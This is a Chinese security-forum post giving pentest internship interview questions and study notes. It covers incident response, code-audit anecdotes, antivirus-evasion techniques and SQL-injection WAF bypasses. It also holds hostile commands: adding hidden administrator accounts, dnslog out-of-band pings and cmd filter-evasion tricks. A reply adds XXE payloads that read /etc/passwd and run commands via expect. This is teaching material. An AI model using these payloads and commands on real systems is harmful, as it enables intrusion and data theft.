小白福州找实习的面试分享

zbs   ·   发表于 2024-02-27 16:37:49   ·   面试经验分享

XX实习安全服务工程师:

自我介绍
1.说说你比较深刻的SRC经历
我:挖到的第一个高危,xx学校的任意密码用户重置。hunter语法搜学院资产,然后在对一个学院的登录接口测试时,发现学号登录时通过bp抓的数据包里有手机号回显,然后利用找回密码接口是手机号和学号验证,过了第一个接口。第二个接口是对手机号的短信验证码验证,通过爆破的方式过了验证,实现了任意密码用户重置;
第二个是一套使用ruoyi的后台,通过ruoyi的默认弱口令登录后,对一处角色管理的接口搜索功能和导出功能 通过updatexml()进行了sql报错注入,以及任意文件的读取,还有发现了shiro反序列化漏洞,通过爆破的方式获得了AES密钥,然后通过shiro的攻击工具,找到了构造链,实现了命令执行。

2.CS工具,说说免杀之类的
我:CS只是会基础的使用,平常没太接触。

事后copy个百度:
免杀手段:
修改特征码,可以根据污点检测的方式定位到触发杀软规则的病毒样本特征,修改明显的特征在一定程度上是可以实现免杀的。

花指令免杀,在程序 shellcode或特征代码区域增添垃圾指令,增加的垃圾指令不会影响文件执行,在动态查杀或者文件hash对比是校验会不一致。

加壳,比如upx加壳等,一般文件落地后对比哈希值也可绕过杀软。

二次编译,一般用于对shellcode进行二次编译bypass杀软。

poweshell免杀,但是一般防护软件或者系统本身正常调用powershell应用程序的时候都会产生告警,一般的安全设备是过不了的,需要在命令上使用手段绕过安全设备监测。
链接:
https://blog.csdn.net/m0_59598029/article/details/132830427

3.攻防演练

我:不太了解
百度学习:
https://zhuanlan.zhihu.com/p/628616559
可以和应急响应结合,蓝队
1.netstat、takllist…查看端口连接、进程,看看有没有奇怪的地方
2.看web日志,有没有可疑数据
3.win+R,输入eventvwr.msc,直接进入事件查看器分析日志,分析日志
4.利用工具(D盾等),对可疑目录扫描,删除webshell
5.清理删除异常用户,利用工具等对端进行加固(白名单等)

红队:
1.web渗透测试,上传后门
2.用webshell工具连接
3.尝试使用net user zkaq /add去添加名为zkaq的用户;使用net localgroup administrators zkaq /add添加到管理员组
4.内网渗透..
5.远程连接或其他方式控制主机,选中开始->管理机工具->计算机管理,修改用户名后添加$进行隐藏

4.有没有做过应急响应,说说应急响应的流程

我:支支吾吾
百度:
1、准备阶段
准备阶段需要做的是主要是明确资产范围对可能产生安全问题的地方进行加固
【主要工作包括建立合理的防御 / 控制措施、建立适当的策略和程序、获得必要的资源和组建响应队伍等】
2、检测阶段
通过日常的监控,收集系统信息日志等手段对可疑的迹象进行分析、判定,如果判定他属于网络安全应急响应时间则对该事件进行上报:
(可以利用netstat -ano查看端口连接情况,也可以使用tasklist | findstr “PID”对具体pid进程定位。系统日志可以win+R,输入eventvwr.msc,直接进入事件查看器分析日志)


系统:
1074,通过这个事件ID查看计算机的开机、关机、重启的时间以及原因和注释。
6005,表示计算机日志服务已启动,如果出现了事件ID为6005,则表示这天正常启动了系统。
104,这个时间ID记录所有审计日志清除事件,当有日志被清除时,出现此事件ID。
安全:
4624,这个事件ID表示成功登陆的用户,用来筛选该系统的用户登陆成功情况。
4625,这个事件ID表示登陆失败的用户。
4720,4722,4723,4724,4725,4726,4738,4740,事件ID表示当用户帐号发生创建,删除,改变密码时的事件记录。
4727,4737,4739,4762,事件ID表示当用户组发生添加、删除时或组内添加成员时生成该事件。
安全事件ID汇总备查:

EVENT_ID 安全事件信息
1100 ——- 事件记录服务已关闭
1101 ——- 审计事件已被运输中断。
1102 ——- 审核日志已清除
1105 ——- 事件日志自动备份
1108 ——- 事件日志记录服务遇到错误
4608 ——- Windows正在启动
4609 ——- Windows正在关闭
4610 ——- 本地安全机构已加载身份验证包
4611 ——- 已向本地安全机构注册了受信任的登录进程
4612 ——- 为审计消息排队分配的内部资源已经用尽,导致一些审计丢失。
4614 ——- 安全帐户管理器已加载通知包。
4615 ——- LPC端口使用无效
4616 ——- 系统时间已更改。
4618 ——- 已发生受监视的安全事件模式
4624 ——- 帐户已成功登录
4625 ——- 帐户无法登录
等等等等https://zhuanlan.zhihu.com/p/648273519
可以在这里查看日志:
日志路径:C:\Windows\System32\winevt\Logs
查看日志:Security.evtx、System.evtx、Application.evtx

【目标是对网络安全事件做出初步的动作和响应,根据获得的初步材料和分析结果,预估事件的范围和影响程度,制定进一步的响应策略,并且保留相关证据。】
3、抑制阶段
分析影响范围,根据预案采取相应手段,限制攻击的范围,设置隔离区,把影响降低到最小(可以使用安全软件把危险文件进行隔离,如果整台电脑完全沦陷,也可以考虑首先断网)

【抑制阶段的目标是限制攻击的范围,抑制潜在的或进一步的攻击和破坏】
4、根除阶段
分析产生安全事件的原因,如果是木马、病毒就需要寻找病毒的传播源并且遏制、如果是入侵行为就可以通过入侵检测的方式捕获并检测数据流,也可以利用一些工具对病毒特征进行扫描分析和定位

【根除阶段的目标是在事件被抑制之后,通过对有关恶意代码或行为的分析结果,找出导致网络安全事件发生的根源,并予以彻底消除】
5、恢复阶段
对受到破坏的系统和信息还原成正常状态,从可信任的备份中恢复还原系统配置数据库等等,并对其进行监控,确保无误后可适当去掉之前的隔离等抑制措施

【恢复阶段的目标是将网络安全事件所涉及的系统还原到正常状态】
6、总结阶段
对我们上面所发生的安全事件进行总结,对你使用到有效的手段和方法做一个记录,对后面可能遇到的事件做一个示例

【总结阶段的目标是回顾网络安全事件处理的全过程,整理与事件相关的各种信息,并尽可能地把所有情况记录到文档中】

5.小程序、公众号的渗透测试+代码审计

我:配置抓包工具xxxxxxx【百度找方法,我之前发过配置方法:https://bbs.zkaq.cn/t/31391.html 不知道现在还能不能用】
然后就当作对web测试一样对小程序公众号进行测试了

实际应该补充:
2.对测试的小程序,在文件管理器找到该小程序的数据包,进行反编译下载源码(js、html)
3.代码审计找漏洞

6.代码审计" class="reference-link">6.代码审计

课上的代码执行、命令执行、变量覆盖、反序列化能想起来多少说多少【别忘了s-cms闪灵的xxe实体注入】:
可以整理一下学的,然后说的会比较通顺:


方法:
通读全文和危险函数定位

1.我审计过douphp框架的代码执行漏洞:将传参的字符串等内容当成代码来执行,如果有代码执行漏洞,我们就可以令服务器执行我们传参的字符串-代码
常见的危险函数:
eval 蚁剑
assert 中国菜刀
preg_replace() /e —> 第一个参数正则表达式,若第三个参数搜索到,就会执行第二个参数的代码
create_function()
array_map()
PHP版本5.5及其以上版本可以使用
“${phpinfo()}” —》单双引号过滤可以防御

unlink 是个删除文件的函数
file_put_contents => 文件写入
对DOUPHP框架进行代码审计:
通过代码审计发现,安装界面有file_put_contents()文件写入函数,并且其中写入文件的内容是可以传参控制的。 然后再通过审计发现进入douphp安装界面需要删除install.lock这个文件。接着定位到了一个unlink删除文件的函数,通过bp抓包方式可以改变传参内容,删除了install.lock进入到了安装界面。
通过文件写入函数以及利用 php里对字符串“${phpinfo()}”-—>会执行phpinfo()代码的特性实现了写入后门getshell

2.我还审计过phpadmin的文件包含漏洞【文件包含漏洞还可以结合图片马将图片马作为代码加载运行】
只有能包含任意文件时,他才是漏洞。
相关函数:
include => include_once
require => require_once
通过代码审计发现include函数的传参我们可以控制:
,但是有白名单检测。
我们通过mysql数据库会记录日志,字段名会在服务器留存文件,在这个文件写上后门,绕过了文件包含对白名单的检测
令include包含 含有后门的日志文件,成功getshell

3.我还审计过duomicms框架的变量覆盖漏洞:
变量覆盖就是后面的变量会覆盖掉前面的变量的值:当我们能够控制某个b变量的生成,是就能去实现另一个a变量的替换了,后续存在其他的危险点,只不过原本的a参数我们不能控制,然后我们通过b变量覆盖去覆盖掉原本不可控的a参数
可能存在变量覆盖漏洞的危险函数:

extract() 将数组转变成变量: 变量名-> 键值 变量值 -> 数组的值
parse_str() 将字符串转变成变量
$$k 先取变量k的值v,然后在转变成变量v

先通过代码审计分析出后台成功登录后session的变量构造
然后通过危险函数定位到了一处$$_REQUEST变量覆盖可控,覆盖session原本的值,成功免登录进入后台。

4.我还审计过IBOS框架的命令执行漏洞:
命令执行相关危险的函数:
1:system() => 直接执行系统指令,并且会打印出我们的结果
//passthru()=> 等价system()
2:exec() => 会执行指令,但是显示结果不会直接输出,结果只保留最后一行
3:shell_exec() => 会执行指令,但是显示结果不会直接输出,保留多行结果;;需要用echo 输出

Ibos有zend加密:
Zend Guard是目前市面上最成熟的PHP源码加密产品,只要PHP加载了这个第三方加密插件,那么就可以直接运行。这类加密会在开头写Zend
我们要代码审计,就得先解码。but!解码之后的代码是不能直接替代原本文件运行的,所以解码后的代码仅仅是静态审计。

通过代码审计,查找到了一个危险函数shell_exec的变量可以被控制,但是他过滤了.和’和”等特殊字符,我们就通过在cmd调用环境变量切割我们需要的.字符,成功上传了后门;

特殊技巧:

  1. 通过 > 符号,将结果输出到某个文件里面,结果覆盖保存
  2. >> 将结果输出到某个文件里面,结果末尾追加
  3. | 管道符,将前面的指令运行结果,当成后面指令的输入内容
  4. ipconfig| findstr "IPv4"
  5. 【查找 ipconfig内容的IPV4内容】

没有回显时,怎么判断我们的指令有没有执行

  1. dnslog.cn 通过dnslog将数据外带
  1. ping -n 1 2.abt1zl.dnslog.cn # windows 用 -n 指定ping的次数
  2. ping -c 1 2.abt1zl.dnslog.cn # linux 用 -c 指定ping的次数
  1. 将指令的结果输出到一个文本文件中,然后去访问这个文件 >, >>, |

熟悉一下cmd相关的命令:
创建用户:net user name password /add
管理员添加:net localgroup administrators name /add
net user 查看本机用户
net localgroup 查看本地分组
net localgroup administrators 具体分组下有那些成员
dir查看文件夹所有内容
whoami/all 可查看权限
nslookup查看域名是否存在
netstat查看所有网络连接、状态、端口号
通过 > 符号,将结果输出到某个文件里面,结果覆盖保存
将结果输出到某个文件里面,结果末尾追加 | 管道符,将前面的指令运行结果,当成后面指令的输入内容 ipconfig| findstr “IPv4” 【查找 ipconfig内容的IPV4内容】
命令执行如何绕过过滤的操作:
1.^【不能连续俩个^否则成转义了】和”【无限制】和成对的()
eg:((((Wh^o^am””i)))) //正常执行
2.通过set变量:
eg:set a=who
set b=ami
%a%%b% //正常执行whoami
3.截取字符串的语法就是
%变量名:~x,y%
即对变量从第x个元素开始提取,总共取y个字符。
当然也可以写-x,-y,从后往前取
写作-x,可取从后往前数第x位的字符开始,一直到字符的末尾
-y来决定少取几个字符
具体看https://bbs.zkaq.cn/t/4557.html

5.我还学过s-cms闪灵框架的XXE实体注入:
通过审计源码,发现了simplexml_load_string()函数,分析找到了其中的此函数的传参可以受我们控制。然后搭建xml接收器,把想要的数据外带出来,传入一个php文件中,再用file_put_contents()把数据传入一个txt文件获取数据。
知识点:
XXE = XML外部实体注入 (被各种后端脚本调用,靶场这里是被php调用),令目标执行我们的XML代码
我们的xml代码主要利用:DTD(通过特殊的命令去其他文件读取信息):SYSTEM
请求一个你自己搭建的php文件,其他的文件。(你想要的数据给带出来)
php文件记录请求的传参内容(记录文件)等着去看就可以了

1、XXE漏洞发生在哪里
任何可以上传XML文件的位置都有可能存在XXE漏洞。若没有对上传的XML文件进行过滤,可导致上传恶意文件。
找xxe漏洞方式:
看到数据包莫名其妙传递、返回XML代码可以试试
代码审计(危险函数定位:找类似simplexml_load…的函数)
2、怎么判断网站存在XXE漏洞
抓包:修改http请求,查看抓取的数据包中是否有提交XML文档,修改提交的XML文档再查看返回包响应,查看应用程序是否解析了修改内容,如果解析了则有可能存在XXE漏洞。
3、XXE漏洞的危害
(1)任意文件读取
如果攻击者可以控制服务器解析的XML文档的内容,引入攻击者想要读取的文件内容作为外部实体,即可尝试读取任意的文件内容。如攻击者构造如下的XML文档就会将/etc/passwd文件的内容引入进来并回显在页面中,造成敏感文件内容泄露。


(2)执行系统命令
如果服务器环境中安装了某些特定的扩展,即可利用其造成任意命令执行,如攻击者构造如下的XML文档:


在安装expect扩展的PHP环境中,PHP解析上面的XML文档,即会执行whoami的系统命令,并将结果回显。
(3)探测内网接口
如果Web服务器的的执行环境在内网,则可以通过请求内网IP的某个端口来判断该IP 的相应端口是否开放,这可以通过直接引用外部实体的方式引入要访问该端口的链接即可实现:

如果回显结果为“Connection Refused”,即可以判断该IP的81端口是开放的。
(4)攻击内网环境
服务器执行XML文档的环境本身在内网,因此XXE漏洞就类似于SSRF攻击,再结合内网中其他主机的漏洞,进一步进行内网渗透。
修复xxe漏洞
1、libxml_disable_entity_loader(true); PHP的(禁止加载XML实体)
2、过滤SYSTEM关键字(无法去其他文件读取信息or访问网站)

XXXX公司渗透测试:

自我介绍

1.SQL注入的WAF绕过

参数污染
内联注释
大小写绕过 (很老的WAF才有用)
替换绕过 (很老的WAF才有用)
特殊符号绕过
编码绕过 )
等价替换 (利用其它函数替代)
容器特性(例如Apace的Hpp,或者是IIS的%分割)
白名单(获得管理员权限xxx)
缓存区溢出(数据超出了WAF检测的范围)

2.说说对渗透测试的了解xxxxxxx" class="reference-link">2.说说对渗透测试的了解xxxxxxx

渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法:
渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。

可以顺便记记OWASP Top 10包括:注入、失效身份验证和会话管理、敏感信息泄露、XML外部实体注入攻击(XXE)、存取控制中断、安全性错误配置、跨站脚本攻击(XSS)、不安全的反序列化、使用具有已知漏洞的组件、日志记录和监控不足。

3.会不会代码审计
同上
4.SRC有没有挖到过高危漏洞,说说
同上,不复制了

5.会不会编程,开发过什么xxxxxx
就说说自己会的编程咯,学校学过的,课程设计或者毕业设计的说说;
我:学校学过python、java,python开发过爬虫,不能绕过登录;java开发过一个抓包工具,可以抓包不能改包0.0;

XX网络安全实习生:

1.代码审计—-
同上
2.会什么编程、开发过什么工具——
同上

3.内网渗透经验——

没有实战经验就讲课上学的:
内网单台服务器渗透:
https://bbs.zkaq.cn/t/31374.html
内网域渗透:
https://bbs.zkaq.cn/t/31378.html

4.攻防演练———
同上

5.SRC说说

XX渗透测试实习:

1.自行渗透的站(Src..)、高危漏洞

2.代码审计-有没有原创漏洞

代码审计同上;
原创漏洞我说无,只能复现,这方面不知道怎么编;

3.编程语言-开发工具

4.靶场渗透测试,内网域

内网单台服务器渗透:
https://bbs.zkaq.cn/t/31374.html
内网域渗透:
https://bbs.zkaq.cn/t/31378.html
5.有无社区公众号文章
拿出了我的zkaq社区号hh

6.有无护网

只能看看网上经验分享
https://zhuanlan.zhihu.com/p/628616559

用户名金币积分时间理由
Track-魔方 100.00 0 2024-03-07 10:10:26 本月首篇有效投稿奖励 100
Track-魔方 600.00 0 2024-03-03 15:03:45 深度 100 普适 300 可读 200

打赏我,让我更有动力~

5 条回复   |  直到 9个月前 | 925 次浏览

Track-魔方
发表于 9个月前

其实这些xxx的内容都可以写上,对别人也有参考意义的:

评论列表

  • 加载数据中...

编写评论内容

zbs
发表于 9个月前

一些整理的知识点:
ARP协议是一个三层协议,工作在第二层(数据链路层)

ARP协议是一种地址解析协议,将一至IP地址解析为MAC地址,从而进行数据交互,ARP协议是一个2.5层协议

一,ARP协议
地址解析协议,即ARP(Address Resolution Protocol)
是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。

地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;
由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。

ARP攻击:
ARP攻击(Address Resolution Protocol攻击),是一种局域网(LAN)攻击方式,攻击者会发送伪造的ARP消息,欺骗网络上其他设备,使其将数据发送到攻击者指定的IP地址。ARP攻击的目的通常是获取敏感信息或者干扰网络通信。
在局域网中,每个设备都有一个唯一的物理地址(MAC地址)和一个IP地址。ARP协议用于将IP地址转换为对应的MAC地址,以便设备可以正确地进行通信。攻击者可以伪造ARP消息,欺骗其他设备将网络流量发送到攻击者的设备上,从而窃取数据或者进行中间人攻击,干扰网络通信等。

第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。

OWASP Top 10包括:注入、失效身份验证和会话管理、敏感信息泄露、XML外部实体注入攻击(XXE)、存取控制中断、安全性错误配置、跨站脚本攻击(XSS)、不安全的反序列化、使用具有已知漏洞的组件、日志记录和监控不足。

注入
当Web应用程序缺乏对使用的数据进行验证和清理的时候,极易发生注入攻击。著名的注入攻击有SQL注入、NoSQL注入、OS注入等。注入攻击会导致数据丢失和被破坏,甚至主机被黑客完全接管。
失效身份验证和会话管理
失效身份验证和会话管理主要发生在Web应用程序身份验证环节,身份验证机制出现逻辑问题便会出现此类问题。黑客会利用身份验证漏洞,尝试控制系统中的账户,一旦操作成功,他便能合法的进行任何操作。
敏感信息泄露
敏感信息泄露是目前存在最广泛的Web应用程序问题,Web应用程序、API未加密,或者无法准确保护敏感信息,均会导致个人信息、密码等敏感信息泄露,被黑客出售给第三人,或用于违法犯罪目的。
XML外部实体注入攻击(XXE)
这种攻击主要针对解析XML输入的Web应用程序。弱配置的XML解析器处理包含外部实体引用的XML输入时,就会发生XXEE攻击。黑客会利用这个漏洞窃取URI文件处理器的内部文件和共享文件,从而监听或执行远程代码,或发动拒绝服务攻击。
存取控制中断
如果对已经身份验证通过的用户,没有实施合适的访问权限控制,那么攻击者便可以通过这个漏洞,去使用未经授权的功能,以及查看未经授权的数据,例如访问用户的账户、查看敏感文件等等。
安全性错误配置
操作者使用默认配置、临时配置、开源云存储、http标头配置等不当配置,攻击者便会利用这些错误配置,获得更高的权限。安全性错误配置是最常见的漏洞之一,攻击难度低。攻击者可使用自动化程序发动攻击,极其危险。
跨站脚本攻击(XSS)
黑客将恶意的客户端脚本注入到目标网站,并将该网站用作传播方法。攻击者发动XSS攻击后,受害网站的显示方式会被黑客控制,网站会被黑客重定向至新页面,或者显示广告、违法犯罪等内容。
不安全的反序列化
攻击程序会尝试在不进行任何验证的情况下,对数据进行反序列化,不安全的反序列化会导致远程代码执行、重放攻击、注入攻击等。
使用具有已知漏洞的组件
如果Web应用程序含有已知的漏洞,攻击者可利用漏洞获取数据或接管服务器。Web应用程序所使用的框架、库或者其他软件模块,会破坏应用程序的防御,造成更为严重的后果。
日志记录和监控不足
日志记录和监控是一种有效的防范手段,它能在发送问题时,帮助你迅速采取行动,如果应用程序日志记录和监控不足,黑客能进一步控制系统,造成更大、更长远的危害。

报错注入的限制条件主要包括以下两个方面:

Web应用程序必须未关闭数据库报错函数。这意味着当执行错误的SQL语句时,应用程序会直接将错误信息回显在页面上。1
后台未对一些具有报错功能的函数进行过滤。这些函数包括但不限于extractvalue()、updatexml()、floor()、exp()等。
这些条件共同作用,使得攻击者可以通过构造特定的SQL语句来获取数据库信息,如数据库名、版本号、用户名等,这些信息通常会通过页面的错误提示显示出来。

超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付信息。
为了解决HTTP协议的这一缺陷,需要使用另一种协议:安全套接字层超文本传输协议HTTPS,为了数据传输的安全,HTTPS在HTTP的基础上加入了SSL协议,SSL依靠证书来验证服务器的身份,并为浏览器和服务器之间的通信加密。

作者:坑队友
链接:https://juejin.cn/post/6844903471565504526
来源:稀土掘金
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

HTTP代理,能够代理客户机的HTTP访问,主要是代理浏览器访问网页,它的端口一般为80、8080、3128等;

SOCKS代理,与其他类型的代理不同,它只是简单地传递数据包,而并不关心是何种应用协议,既可以是HTTP请求,所以SOCKS代理服务器比其他类型的代理服务器速度要快得多。SOCKS代理又分为SOCKS4和SOCKS5。SOCKS5代理则既支持TCP协议又支持UDP协议(即用户数据包协议),还支持各种身份验证机制、服务器端域名解析等。

代理速度不同

http代理工作在应用层上,只允许用户通过HTTP协议访问外部网站;

Socks5代理工作在会话层,不要求应用程序遵循特定的操作系统平台,Socks5代理只是简单地传递数据包,而不必关心是何种应用协议(比如FTP、HTTP和NNTP请求)。

由上可知,Socks5代理比http代理速度要快得多。

适用范围不同

socks包含https,https包含http,socks代理适用的范围最广;

https协议只支持http/https,一般的ie代理用的http/https协议。如果是应用层协议一般不用http/https,有些应用程序只能使用socks代理。

三、XXE漏洞
1、XXE漏洞发生在哪里
任何可以上传XML文件的位置都有可能存在XXE漏洞。若没有对上传的XML文件进行过滤,可导致上传恶意文件。

2、怎么判断网站存在XXE漏洞
抓包:修改http请求,查看抓取的数据包中是否有提交XML文档,修改提交的XML文档再查看返回包响应,查看应用程序是否解析了修改内容,如果解析了则有可能存在XXE漏洞。

3、XXE漏洞的危害
(1)任意文件读取

如果攻击者可以控制服务器解析的XML文档的内容,引入攻击者想要读取的文件内容作为外部实体,即可尝试读取任意的文件内容。如攻击者构造如下的XML文档就会将/etc/passwd文件的内容引入进来并回显在页面中,造成敏感文件内容泄露。

<?xm1 version=”1.0” encoding-“utf-8”?>
<!DOCTYPE ANY[
<!ENTITY xxe SYSTEM “file:///etc/passwd”>
]>

<x>&xxe;</x>
(2)执行系统命令

如果服务器环境中安装了某些特定的扩展,即可利用其造成任意命令执行,如攻击者构造如下的XML文档:

<?xml version=”1.0” encoding-“utf-8”?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM “expect://whoami”>
]>

<x>&xxe;</x>
在安装expect扩展的PHP环境中,PHP解析上面的XML文档,即会执行whoami的系统命令,并将结果回显。

(3)探测内网接口

如果Web服务器的的执行环境在内网,则可以通过请求内网IP的某个端口来判断该IP 的相应端口是否开放,这可以通过直接引用外部实体的方式引入要访问该端口的链接即可实现:

<?xm1 version=”1.0” encoding=”utf-8”?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM http://192.168.1.1:81/mark
]>

<x>&xxe</x>
如果回显结果为“Connection Refused”,即可以判断该IP的81端口是开放的。

(4)攻击内网环境

服务器执行XML文档的环境本身在内网,因此XXE漏洞就类似于SSRF攻击,再结合内网中其他主机的漏洞,进一步进行内网渗透。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/xcxhzjl/article/details/121398224

而一个Excel文件其实也包含了许多部分,可以将一个以.xlsx为后缀的excel文件更改后缀名为.zip,然后进行解压缩
既然其中有XML文件,不难联想到XXE漏洞。

评论列表

  • 加载数据中...

编写评论内容

zbs
发表于 9个月前

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 9个月前

这两块代码被吞掉咯,代码以截图的方式放上去吧:

评论列表

  • 加载数据中...

编写评论内容

qr
发表于 9个月前

1

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.